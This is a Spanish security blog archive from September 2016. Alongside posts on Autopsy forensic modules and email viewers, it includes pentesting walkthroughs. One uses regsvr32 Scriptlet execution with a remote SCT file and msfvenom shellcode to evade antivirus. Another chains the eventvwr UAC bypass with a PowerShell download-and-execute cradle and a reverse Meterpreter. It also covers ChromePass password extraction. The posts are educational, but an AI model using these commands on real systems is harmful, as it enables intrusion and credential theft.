28 sept 2016

Los módulos de ingesta de Autopsy. Parte 2



Buenas a todos, en el post de hoy continuaremos con la cadena de análisis forense digital con Autopsy, hablando de los módulos de ingesta de terceros.

Los módulos de terceros son módulos desarrollados por la comunidad, y que pueden ser desplegados en las instalaciones de Autopsy, en sus últimas versiones.

Desde el siguiente enlace podéis acceder a los módulos compartidos oficialmente:


A continuación os listamos todos ellos, junto con una descripción sobre su funcionamiento:

Prefetch Parser

  • Description: This module will process thru all the prefetch files in the C:\Windows\Prefetch directory and parse out the information in them. It works on the following windows versions XP, Vista/7, 8/8.1 and 10. Winner of the OSDFCon 2015 Python Module challenge.
  • Author: Mark McKinnon

sdhash (Autopsy AHBM)

  • Description: This module allows you to use sdhash to perform fuzzy hash matching. The investigator can match files against other files or sdhash reference sets during ingest, or search for similar files from the directory viewer or search results after ingest. Released as part of OSDFCon 2013 Development contest. 
  • Author: Petter Bjelland

SmutDetect Module

  • Scans JPG, BMP, PNG & GIF files (selection of files based on file signatures) for pixels with skin tone and computes file percentage. Files are tagged with skin-tone percentage in increments of 10 to allow a categorised view of thumbnails.
  • Author: Rajmund Witt

Windows Registry Ingest Module

  • Description: An ingest module that extracts Registry keys and values into derived directories and files so that they show up as nodes in the directory tree. First place winner in the OSDFCon 2013 challenge.
  • Author: Willi Ballenthin

Child Exploitation Hashset Modules

  • Description: Hash lookup modules that integrate with ProjectVic and C4All databases. These allow you to use Autopsy in child exploitation investigations and leverage hashsets of pre-categorized images.
  • Author: Basis Technology

VirusTotal Online Checker

  • Description: Autopsy File Ingest Module to check file hashes against online VirusTotal Database
  • Author: Mathias Vetsch, Luca Tännler

Copy-Move Module Package

  • Description: A module package containing a File Ingest Module and its corresponding Data Content Viewer. Allows the user to identify Copy-Move forgeries within images in the datasource. Please read the readme before using the package.
  • Author: Tobias Maushammer

Image Fingerprint Module Package

  • Description: A module package containing a File Ingest Module and its corresponding Data Content Viewers. Allows the user to create different perceptual hashes as fingerprints from images in the datasource. This also creates an additional database, which is managed from the expanded options menu of the ingest module. Images can be compared to images in the database. Please read the readme before using the package.
  • Author: Tobias Maushammer

Video Triage

  • Description: Analyzes video files and displays a series of images so that you can get a basic idea of what the video contains without viewing the entire thing. 
  • Author: Basis Technology

Windows Registry Content Viewer

  • Description: Content viewer that analyzes a registry hive and allows you to navigate the tree and its key and value pairs. Functions something like Regedit.exe. Winner of the OSDFCon 2013 challenge.
  • Author: Willi Ballenthin

Multi Content Viewer

  • Description: Content viewer for dozens of file types: html, pdf, eml, emlx, rtf, doc, docx, xls, xlsx, ppt, pptx, odt, ods, odp, wps, wpd, sxw, eps, dbf, csv, tif, emf, wmf, odg, pcx, pbm, svg, pict, vsd, psd, cdr, dxf, and more. Also highlights and enables navigation through keyword hits on the rendered preview.

Como veis, hay un poco de todo, y disponemos de módulos más orientados a fuerzas y cuerpos de seguridad, como el de "Child Exploitation Hashset", o los de análisis de vídeos e imágenes, otros módulos más orientados a analistas de malware y software dañino, como los módulos de Virus Total, Prefetch o de Windows Registry Content Viewer, y otros módulos más generales. En el enlace anterior podéis encontrar la versión mínimo de Autopsy necesaria para el funcionamiento de cada uno de ellos y el enlace para su descarga.

Os animo a probar Autopsy con sus módulos de ingesta de terceros y a compartir con nosotros vuestras experiencias. 

Hasta el próximo post, 

Saludos!

26 sept 2016

Los módulos de ingesta de Autopsy. Parte 1

Buenas a todos, en el post de hoy me gustaría hablaros de una de las características mas potentes que posee la herramienta de análisis forense digital Autopsy, a partir de la versión 3 para entornos Windows, los módulos de ingesta.

Actualmente en su versión 4.1.1, Autopsy es una de las herramientas gratuitas más potentes que se pueden utilizar en un proceso de estudio forense. Esta última versión, en concreto la de 32 bits, a mí no me ha funcionado en los equipos que he probado, produciéndose un error durante la fase de ingesta (si alguien ha experimentado problemas similares podéis comentarlo también al equipo de desarrollo). Sin embargo la versión 4.1.1 de 64 bits funciona sin problemas y la versión anterior 4.1.0 me ha funcionado sin problemas tanto en su versión de 32 bits como en 64 bits.

Los módulos de ingesta permiten procesar los datos contenidos en un disco que nos encontremos analizando, extrayendo la información de interés, clasificándola y permitiéndonos exportarla a numerosos formatos de una forma sencilla y cómoda. No es la herramienta más rápida, sobretodo si la comparamos con algunos de sus hermanos mayores como Encase Forensic, pero sí es una utilidad  bastante efectiva.



Existen 2 grandes tipos de módulos de ingesta. Los que vienen incluidos en la propia herramienta, los cuales podéis ver en la imagen anterior y os describiremos a continuación, y los módulos de ingesta que aporta la comunidad, y que podéis ver desde el siguiente enlace, donde encontraréis módulos tan interesantes como analizadores de Virus Total o chequeadores del registro de Windows . De los módulos de terceros os hablaremos en el próximo artículo de esta cadena:


En los módulos nativos, de arriba a abajo (según su orden de aparición) nos encontraremos con los siguientes módulos:

Módulo de análisis de actividad reciente

A grandes rasgos, su misión más importante es la de recopilar la actividad del usuario de los navegadores web y el Sistema Operativo, entre otras labores.

Módulo de consultas de Hashes

Detecta archivos conocidos peligrosos mediante una lista de hashes conocidos de NIST NSRL. Esta base de datos puede ser configurada para ampliar los hashes.

Módulo de identificación de archivos

Detecta la tipología de los archivos mediante la librería Tika. Se pueden definir tipos diferentes que no se encuentren incluidos.

Modulo de extracción de ficheros empotrados

Abre archivos de formatos como Rar, Zip, Doc/Docx, Ppt/pptx, Xls/Xlsx, etc, para después analizarlos.

Módulo interprete EXIF

Extrae información EXIF de imágenes.

Módulo de palabras clave

Mediante una lista de palabras clave, y sobre los archivos previamente indexados, permite identificar palabras clave (muy útil para buscar ciertos tags en un forense).

Módulo de correos electrónicos

Identifica emails de Thunderbird y PST, y extrae los emails con toda su información vinculada.

Módulo detector de incoherencias de extensión

Como el titulo indica, identifica ficheros con una extensión no asociada con los tipos de archivos detectados.

Módulo verificador E01

Calcula el checksum de los archivos de encase para confirmar si se encuentran en correcto estado.

Módulo analizador de Android

Interpreta archivos de dispositivos Android.

Módulo identificador de archivos "Interesantes"

Literalmente, buscar archivos y carpetas mediante reglas especificadas en la configuración.

Módulo photorec carver

Rastrea ficheros en el espacio "no asignado" del disco y los indexa para su análisis. Muy interesante para recuperar archivos eliminados.



Eso es todo por hoy, en el siguiente post os hablaremos de los módulos de terceros.

Saludos!

25 sept 2016

Informe Flu - 268



Buenas a todos, como cada semana os traemos nuestros enlaces de la semana :)

Miércoles 21 de Septiembre
  • El miércoles os hablamos del Análisis de emails de Thunderbird y Outlook con MiTeC Mail Viewer, un visor de archivos de Microsoft Outlook Express, Windows Live Mail, Mozilla Thunderbird y EML, basado en MiTeC Outlook Express Reader y MiTeC Thunderbird Reader, para listar los mensajes contenidos con todas sus propiedades, ver vistas detalladas, incluyendo archivos adjuntos y vista previa HTML [...]
    Viernes 23 de Septiembre
    • El viernes nuestro compañero Pablo publicó el artículo Bypassing AV y Whitelists con Scriptlets donde nos hablaba de los Scriptlets, los cuales permiten una técnica potente de empaquetamiento porque proporcionan la forma de crear objetos COM+ implementados a través de ficheros XML. Los Scriptlets son ejecutados por el componente de ejecución (scrobj.dll). Para mayor detalle sobre los Scriptlets os recomendamos la lectura de InsideCOM+ [...]

    Saludos!

      23 sept 2016

      Bypassing AV y Whitelists con Scriptlets

      Hace unas semanas, mi compañero de Eleven Paths, Cristian Borghello me pasó un artículo que hablaba de un bypass de AV y otros mecanismos de protección a través de ficheros SCT. Quizá algunos de vosotros piensen como yo, ¿Ficheros SCT? Yo, confieso que, tuve buscarlo. Existen tres formas de empaquetar un objeto COM+: mediante código nativo (DLL y EXE), clases de Java (.class) y Scriptlets (.sct). Estos últimos serán el protagonista de esta entrada. Los Scriptlets permiten una técnica potente de empaquetamiento porque proporcionan la forma de crear objetos COM+ implementados a través de ficheros XML. Los Scriptlets son ejecutados por el componente de ejecución (scrobj.dll). Para mayor detalle sobre los Scriptlets os recomendamos la lectura de InsideCOM+.

      Como mencionaba mi compañero Cristian en la Comunidad de Eleven Paths, cuando un pentester está planificando un test de intrusión, se suele pensar en la etapa de análisis, explotación y post-explotación. Esta última etapa es, para muchos, quizás a la que menos tiempo se dedica en la preparación. ¿Por qué? Se suele pensar que una vez se compromete una máquina o una red, saltar las medidas de seguridad es sencillo, pero esto puede complicarse hasta puntos insospechados previamente. En otras palabras, no siempre la post-explotación es sencilla, dependerá de la madurez de algunos controles internos y políticas desplegadas en la organización.

      El uso de herramientas no siempre nos va a proporcionar el éxito que necesitamos en una fase de post-explotación. Por esta razón, las nuevas técnicas que van apareciendo son importantes para los test de intrusión de hoy en día. Hace poco vimos un nuevo bypass UAC para Windows 7/10, para el que desarrollamos un módulo de Metasploit

      La idea de poder ejecutar acciones en un sistema a través de Scriptlet COM es algo interesante a la hora de pasar desapercibido ante las medidas de protección de los sistemas. Los archivos SCT son altamente desconocidos. Al hacer doble click sobre ellos, se ejecuta el notepad.exe. Si queremos realmente ejecutarlos debemos hacerlo a través de la aplicación regsvr32. Algo del estilo: regsvr32 /s /u /i:<ruta hacia el fichero SCT> scrobj.dll. Lo más interesante es que al ser algo que no se suele ver o conocer por el gran público, permite saltar la seguridad del antivirus o una lista blanca que se encuentre configurada como medida de protección. Como me decía Cristian, la ofuscación es algo sencillo al ser un lenguaje interpretado. 

      PoC: One shot!

      Hemos llevado a cabo una prueba de concepto y es algo bastante sencillo de llevar a cabo. Desde el Github de SubTee disponemos de una prueba de concepto para ver el efecto y el potencial de la técnica. 


      Al llevar al equipo víctima el fichero SCT y hacemos doble clic veremos que se nos abre un notepad.exe que nos muestra el contenido del fichero. Para llevar a cabo su ejecución lanzamos la siguiente instrucción: regsvr32 /s /u /i:[ruta fichero SCT] scrobj.dll.


      La ruta del fichero SCT podría ser remota. En el ejemplo anterior, vemos como ejecutamos un fichero que se encuentra localmente en el equipo, pero en otro escenario podríamos traer el fichero SCT de un servidor web que tengamos en cualquier otro lado.
      El fichero “calc.sct” contiene el código para abrir una calculadora en el sistema. Realmente si analizamos el código, vemos que tenemos la opción de ejecutar una shellcode, por lo que dicha shellcode se podría generar de manera sencilla con msfvenom, herramienta del framework Metasploit. 


      Como se puede ver hay una sección dentro del XML del fichero SCT que permite la inclusión de código, en este caso JScript. Como se puede ver en la línea comentada con la ejecución de msfvenom, podemos generar otros payload y modificar el fichero para ejecutar otras cosas. 
      Utilizando la instrucción msfvenom -p windows/shell_bind_tcp -a x86 –platform win -e [encoder] -f csharp LHOST=[IP] LPORT=[PORT], podemos almacenarlo y modificarlo en nuestro fichero SCT con el objetivo de poder llevar a cabo el bypass. Ahora, probaremos a ubicar el fichero SCT en un servidor remoto y llevaremos a cabo la ejecución de regsvr32 /s /u /i:http://ruta/ficheroSCT scrobj.dll. Esto provocará su ejecución y la shellcode se quedará a la escucha en el puerto configurado, para este ejemplo el 4444.


      Como se puede ver en la imagen, tenemos a nuestra shellcode a la escucha en el puerto 4444. Ahora, podemos utilizar un nc o el módulo multi/handler de Metasploit para recuperar la sesión y poder interactuar con el sistema de manera remota.


      Interesante técnica, que puede ser utilizada en un momento dado durante la realización de un pentesting o Ethical Hacking. Esta es una forma de evadir listas blancas de aplicaciones a utilizar y de que un sistema AV pueda detectarnos, al menos por ahora. Si conoces mitigaciones sobre esto coméntanosla, así como si conoces otro tipo de bypass.

      21 sept 2016

      Análisis de emails de Thunderbird y Outlook con MiTeC Mail Viewer

      Muy buenas a todos, tras una temporada sabática fuera de España recorriendo algo de mundo, ya estoy de vuelta para continuar con Pablo este nuevo ciclo 2016-2017 que acaba de dar comienzo :) Hoy me gustaría compartir con vosotros una herramienta para el análisis de emails de Outlook y Thunderbird, que suelo utilizar a menudo en los procesos forenses. Se trata de MiTeC Mail Viewer.

      Mail Viewer es un visor de archivos de Microsoft Outlook Express, Windows Live Mail, Mozilla Thunderbird y EML. Se basa en MiTeC Outlook Express Reader y MiTeC Thunderbird Reader. Tiene la capacidad de listar los mensajes contenidos con todas sus propiedades, ver vistas detalladas, incluyendo archivos adjuntos y vista previa HTML. 

      También dispone de un buscador para aplicar filtros. Muy útil si precisáis localizar algún email en concreto, que luego además podréis exportar a EML. 

      Su uso es tan sencillo como abrir la aplicación y seleccionar el archivo con el buzón de correo:



      Tras unos minutos de procesado (en función del tamaño del buzón), se listará una vista con todos los emails, ordenados por columnas:


      Si hacéis clic sobre cualquiera de ellos se os abrirá como si de un Outlook o Thunderbird se tratase:


      Esta aplicación la podréis descargar desde el enorme catálogo de herramientas forenses que presenta MiTec, y al cual podréis acceder desde el siguiente enlace:


      ¡Disfrutadlo!

      14 sept 2016

      Especialista en Seguridad Informática y de la Información por la UCLM (Online) - 2ª Edición

      La Universidad de Castilla-La Mancha oferta la segunda edición del Título Propio de Especialista en Seguridad Informática y de la Información, en su modalidad Online. En este caso hablamos de un título propio o de especialización que llevará al estudiante por diversos contenidos que harán que pueda entrar en el mundo laboral con los conocimientos necesarios. Hemos trabajado en tener un elenco de profesores diverso y especializado en distintos ámbitos de la seguridad informática. También hemos pensado que las personas dedicadas a la seguridad informática deben tener una mínima base sobre seguridad de la información. Esto se ve reflejado en el contenido del título

      El título propio se llevará a cabo de forma online a través de un gestor como Moodle, dónde los alumnos contarán con herramientas como Foros y apuntes para realizar el aprendizaje. Además se llevarán a cabo sesiones online de 2 horas dónde los profesores impartirán sus clases con un enfoque eminentemente práctico. La herramienta utilizada para las sesiones será Webex. El objetivo del título propio es formar a profesionales en el ámbito de la seguridad informática. Las clases son grabadas y pueden ser visualizadas posteriormente.

      Los profesores con los que contará el título propio son los que se enumeran a continuación. Cómo podéis ver hay gran calidad entre los profesores, y cada uno especializado en la asignatura que impartirán.

      Pablo González (@pablogonzalezpe)
      Jordi Serra (@jserrai)
      Rafa Sánchez (@r_a_ff_a_e_ll_o)
      Carmen Torrano Giménez
      David Meléndez Cano
      Félix Brezo
      Yaiza Rubio
      Miguel Ángel Arroyo
      Eduardo Sánchez (@edusatoe)
      Javier Plaza
      Daniel González
      Miriam García
      Eduardo Arriols Nuñez
      Juan Francisco Bolívar
      Raúl Fuentes Ferrer
      Valentín Martín Manzanero
      Pilar Villa
      Daniel Echeverry
      José Luis Martínez
      Marcos Hernández
      Rafa Otal
      Miguel Cotanilla
      José Antonio Ballesteros

      Los alumnos matriculados en el título propio recibirán 5 libros de la editorial 0xWord como material complementario al que los profesores puedan darles. Los libros que se entregarán son los siguientes:
      • Metasploit para Pentesters.
      • SQL Injection.
      • Ethical Hacking.
      • Hardening en sistemas GNU/Linux.
      • Ataques a redes de datos.
      Por último, informarte que con tu título propio puedes optar a una certificación CCNA Security de Cisco, consúltalo! Para más información se puede acceder AL SITIO WEB o contactar con joseluis.martinez@uclm.es. 

      8 sept 2016

      Windows Exploit Suggester: Conoce qué vulnerabilidades y exploits afectan a tus sistemas Windows

      Windows Exploit Suggester es una herramienta de las que pueden ayudar a conocer el estado real de los sistemas Microsoft en cuanto a actualizaciones del sistema. La herramienta permite obtener un listado de paquetes de actualizaciones que faltan por instalar y, además, indica qué vulnerabilidades son las que afectan al sistema. Como nota diferenciadora nos indica qué exploits existen en exploit-db o qué módulos de Metasploit hay públicos para llevar a cabo una posible explotación. Es una herramienta bastante flexible y potente que automatiza la revisión de seguridad del sistema operativo con un toque de seguridad ofensiva.

      La herramienta realiza una comparativa del número de parches o actualizaciones contra la base de datos de Microsoft. De esta forma se detecta, potencialmente, las actualizaciones que faltan en la máquina. Aunque, como dije anteriormente, lo que más llamó mi atención fue que te diera el nombre de los módulos de Metasploit que se pueden utilizar para explotar las vulnerabilidades del sistema, incluso de Internet Explorer, y los enlaces a exploit-db cuando no hay módulo de Metasploit para obtener el posible exploit. 

      Para obtener la herramienta Windows Exploit Suggester se puede descargar desde su sitio de Github. Como nota añadir que en el sistema que ejecutemos la herramienta, pueden ser sistemas Windows, se necesita instalar la librería “xlrd” de Python para el manejo de los documentos xls.


      Lo primero es obtener el fichero con la información de Microsoft sobre vulnerabilidades y los boletines de seguridad. Para ello, utilizamos el parámetro update, tal y como puede verse en la imagen. La ejecución de la instrucción Python windows-exploit-suggester.py –update nos proporcionará el fichero xls actualizado.


      Hay que asumir que la herramienta analiza todos los paquetes de actualizaciones que faltan en el sistema por lo que se pueden obtener falsos positivos, ya que hay que tener claro que software hay instalado sobre el sistema. Por ejemplo, puede que la herramienta nos diga que faltan paquetes de actualizaciones que solventan problemas en IIS, e incluso que hay exploits para IIS, y puede que IIS no esté siendo ejecutado sobre el sistema. El ejemplo anterior puede ocurrir en un sistema operativo servidor.

      ¿Qué utiliza la herramienta para poder inferir las vulnerabilidades y ver qué exploits hay disponibles? Se utiliza un volcado de la información obtenida con el comando systeminfo. Gracias a la información recopilada en la ejecución del comando systeminfo la herramienta puede matchear qué paquetes de actualización falta y poder hacer la inferencia. 


      La instrucción a ejecutar es Python windows-exploit-suggester.py –database [fichero vulnerabilidades XLS] –systeminfo [fichero systeminfo.txt]. Como se puede ver en la salida podemos encontrar líneas con “[E]”, esto quiere decir que hay un exploit o entrada en exploit-db. Las líneas que empiezan por “[M]” indican la existencia de un módulo para Metasploit. 

      En el ejemplo anterior se puede leer, por ejemplo, en una línea “[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) – Critical”. En este caso es sencillo buscar en Metasploit para encontrar el módulo, aunque viendo que afecta a Internet Explorer ya sabemos que el módulo se alojará en exploit/windows/browser. 


      Como se puede ver Windows Exploit Suggester es una herramienta que ayuda a encontrar vulnerabilidades y exploits en los sistemas de la organización. Puede ser útil para una auditoria de caja blanca, e incluso en auditoria caja gris, ya que se podría extrapolar la teoría de que si una máquina tiene X paquetes instalados, el resto podrían estar en un estado similar. 

      6 sept 2016

      Fileless: Bypass UAC con Eventvwr e hijacking del registro

      Hace unas semanas hablábamos de un bypass para UAC en Windows 10 de la mano de Matt Graeber. De nuevo es Matt Graeber el que ha publicado un nuevo método para saltarse el UAC, siempre y cuando el usuario pertenezca al grupo administradores. Las técnicas conocidas para llevar a cabo un bypass de UAC necesitan de la copia de un archivo, generalmente una DLL, en disco. La nueva técnica proporciona una forma de no copiar un archivo al disco, lo cual supone un “plus” a la hora de evadir mecanismos de seguridad y/o protección. Tal y como anunciaba Matt en su Github, la técnica se ha probado en Windows 7 y Windows 10. 

      ¿En qué consiste el bug? Cuando el proceso eventvwr.exe se ejecuta realiza algunas consultas al registro de Windows, en concreto contra la sección HKEY_CURRENT_USER. Eventvwr genera esas consultas siendo un proceso de alta integridad, es decir, se ejecuta con privilegio. ¿Qué hives son importantes en este bug? HKCR, HKEY_CLASSES_ROOT, es una de ellas. ¿Qué es? Es un hive dónde se combina HKLM:\Software\Classes y HKCU:\Software\Classes. Esto es realmente interesante, ya que HKCU puede ser modificado por el usuario normal, mientras que HKLM no. Entonces, si un proceso elevado, como puede ser en este caso eventvwr.exe ejecuta algo del hive HKCR, potencialmente se podría realizar un hijacking de las acciones y éstas se ejecutarían con integridad alta.

      Además, el binario eventvwr.exe auto eleva debido a su manifest. Se sabe que algunos binarios de Microsoft están firmados por ellos de tal forma que el sistema operativo los auto eleva. Se puede encontrar más información sobre este tema en Microsoft. Volviendo al tema de los hives de registro, el proceso eventvwr.exe interactúa con HKCU\Software\Classes\mscfile\shell\open\command, aunque dicha consulta acaba en un “Nombre no encontrado”. Esto puede ser ojeado con Process Monitor de Sysinternals.


      Por otro lado, eventvwr.exe también realiza una consulta a HKCR\mscfile\shell\open\command, y el valor predeterminado es mmc.exe.


      Aunque la consulta a HKCU devolvió un error, se realizó antes que a HKCR, por lo que deja la puerta abierta a que el proceso eventvwr.exe pueda invocar o interactuar con lo que en HKCU se ponga, haciendo que haya una potencial elevación de privilegio mediante un bypass al UAC.

      La PoC de Matt

      Viendo dónde radica el fallo Matt propone un nuevo escenario. Se decide crear la estructura de registro necesaria para que eventvwr.exe consulte correctamente la ubicación HKCU, en lugar de la ubicación HKCR. En la prueba de concepto que se puede encontrar en el Github de Enigma0x3 se puede ver cómo en la ubicación HKCU\Software\Classes\mscfile\shell\open\command se incluye como valor el ejecutable de powershell.

      Esta acción sustituye al valor esperado, que sería mmc.exe, por el valor de powershell.exe. A medida que el proceso continúa, se consigue ejecutar una powershell, en lugar del mmc.exe, que sería el valor esperado. Si se echa un ojo con Process Explorer se podría ver cómo la Powershell se está ejecutando con integridad alta, por lo que aquí tendríamos ya la elevación del privilegio.

      Si se puede ejecutar una Powershell, se podría ejecutar un script malicioso, sin lugar a la duda. En resumen, Matt consigue ejecutar código en un proceso de alta integridad, bypass del UAC, sin necesidad de secuestrar una DLL u otro archivo y sin copiar archivos a disco. Esto reduce de forma muy significativa el riesgo de detección para el atacante.

      ¿Podemos ver un ejemplo? Matt Graeber y Enigma0x3 han publicado un script que implementa una función denominada Invoke-EventVwrBypass, la cual lleva a cabo la modificación del hive de HKCU y la invocación del proceso eventvwr.exe. El resultado final, si todo funciona correctamente, es que se genera un archivo denominado UACBypassTest.txt en la ruta c:\, la cual solo puede ser escrita cuando se tiene privilegio máximo en el sistema.

      Una vez descargado el script de Powershell que tiene el exploit para realizar el Bypass de UAC se puede abrir una Powershell y ejecutar import-module [nombreScript.ps1].


      Como se puede ver en la imagen anterior, se ejecuta la función Invoke-EventVwrBypass junto al parámetro Command. En el parámetro Command se le indica que queremos ejecutar con privilegio, y se realiza una llamada al binario powershell.exe y el código encodeado. Ese código encodeado generará un archivo en una ruta privilegiada, como es C:\, tal y como se puede ver en la siguiente imagen.


      La PoC nuestra

      La PoC de Matt y Enigma0x3 ha demostrado que existe un Bypass de UAC, pero nosotros hemos querido un paso más allá y hacer la ejecución de código más práctica. El escenario propuesto es el siguiente:

      - Acceso físico o remoto al equipo. En este caso se hará una demostración con acceso físico, pero como se pudo ver en el artículo Tater & Hot Potato: Ownear sistemas Microsoft Windows, se podría tener acceso remoto mediante la explotación de alguna vulnerabilidad y llevar a cabo el bypass a través del payload de Powershell para Metasploit.
      - Haremos que Powershell se descargue una función dinámicamente y la ejecute. Esta función será Invoke-Shellcode del framework de post-explotación Powersploit.
      - La función descarga dinámicamente y su ejecución será encodeada para que la función Invoke-EventVwrBypass la pueda ejecutar.
      - Una vez conseguido el bypass recibiremos un Meterpreter en nuestra consola remota de Metasploit.
      - Demostraremos que tenemos un Meterpreter que se ejecuta en el contexto de System.

      En primer lugar, vamos a estudiar un pequeño código y todo lo que nos ofrece. La sintaxis es sencilla: IEX (New-Object Net.WebClient).DownloadString(‘[ruta HTTP fichero PS1]’). Este código lo que hace es descargarse desde una ubicación externa cualquier tipo de código PS1, y mediante el uso de ‘IEX’, Invoke-Expression, se lleva a cabo su ejecución. El fichero que descargaremos será un script PS1 que tendrá la función Invoke-Shellcode y una línea que configura su ejecución al estilo Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lport 8000 -Lhost 192.168.56.101 -Force. Hay que señalar que se está usando una versión antigua de Invoke-Shellcode. 

      Ahora para encodear la instrucción IEX (New-Object Net.WebClient).DownloadString(‘[ruta HTTP fichero PS1]’), se puede utilizar la función Out-EncodedCommand, la cual puede ser descargado desde Powersploit. 


      Ese código encodeado será el que debamos utilizar para la función Invoke-EventVwrBypass. Antes de seguir, se debe configurar en Metasploit el módulo exploit/multi/handler para recibir la conexión. Los parámetros para esta PoC son sencillos:

      - Payload: windows/meterpreter/reverse_http.
      - LHOST: [IP nuestra]
      - LPORT: 8000

      Ahora, abriendo una Powershell, con el módulo importado de Invoke-EventVwrBypass, se ejecuta la siguiente línea Invoke-EventVwrBypass -Command “[ruta Powershell] -enc [Código encodeado]”.  


      Esto aprovechará la vulnerabilidad explicada anteriormente y nos proporcionará una sesión en la dirección IP dónde le hayamos indicado. Al recibir la sesión en nuestra consola de Metasploit podemos comprobar que el usuario es SYSTEM y podemos, por ejemplo, realizar un volcado de hashes de la máquina. Tenemos el control total.


      Conclusiones

      Esta técnica no requiere copiar archivos en disco, y directamente todo ocurre en memoria, lo cual ayuda, y mucho, a evadir sistemas de seguridad. Esta técnica no requiere ningún proceso de inyección. Esta técnica permite lograr un bypass de UAC, es decir, no es una escalada de privilegios total, ya que se necesita que el usuario pertenezca al grupo administradores. El fallo de seguridad puede ser remediada estableciendo el nivel de UAC en “Siempre notificar”, aunque a muchos usuarios les pese encontrar ese mensaje, o incluso en “Siempre solicitar credenciales”. En definitiva, nueva técnica que deberemos llevar en la mochila del pentester.


      5 sept 2016

      ChromePass: extrayendo contraseñas de Google Chrome

      En el post de hoy nos gustaría seguir presentado herramientas para la extración de credenciales. En esta ocasión os mostraremos la aplicación "ChromePass", cuyo objetivo al igual que el de Passwordfox es extraer credenciales de un navegador web, pero en este caso del navegador Google Chrome.

      ChromePass también es una solución del equipo de Nirsoft, la cual podréis descargar desde el siguiente enlace:


      ChromePass nos permitirá  ver los nombres de usuario y contraseñas almacenadas por el navegador web Chrome. De forma predeterminada, para cada contraseña muestra la URL Origen, el nombre de usuario, la contraseña, el campo del nombre, el campo de la contraseña, fecha de creación, etc.

      También permite extraer las credenciales de otro perfil de usuario o carpeta. A continuación os dejamos con un ejemplo de su funcionamiento:


      ChromePass es una solución portable que no requiere de instalación, por lo que la podremos llevar en nuestro pendrive con las herramientas de trabajo habituales :)

      Saludos!

      2 sept 2016

      BSides Colombia 2016 - Conquistaremos el mundo!

      Hace poco recibí un email de un amigo y compañero colombiano para participar en las BSides Colombia. Mi respuesta fue: Sin duda, cuenta conmigo. En esta ocasión podré estar de forma remota allá, por lo que se realizará una talk el próximo 7 de Septiembre, en el siguiente horario: 10.00 hora Colombia, 17.00 hora España. La charla que tendré el honor de impartir será la de how can bad boys (or even u) rule the world


      El resto de charlas se celebrarán presencialmente los días 16 y 17 de septiembre, y contará con la participación de grandes amigos como Juan Garrido "Silverhack", quién impartirá un par de charlas. Grandes ponentes que estarán en Colombia para mostrar nuevas vulnerabilidades, riesgos y amenazas del día de hoy en Internet. 

      Os esperamos el próximo 7 de septiembre en la charla.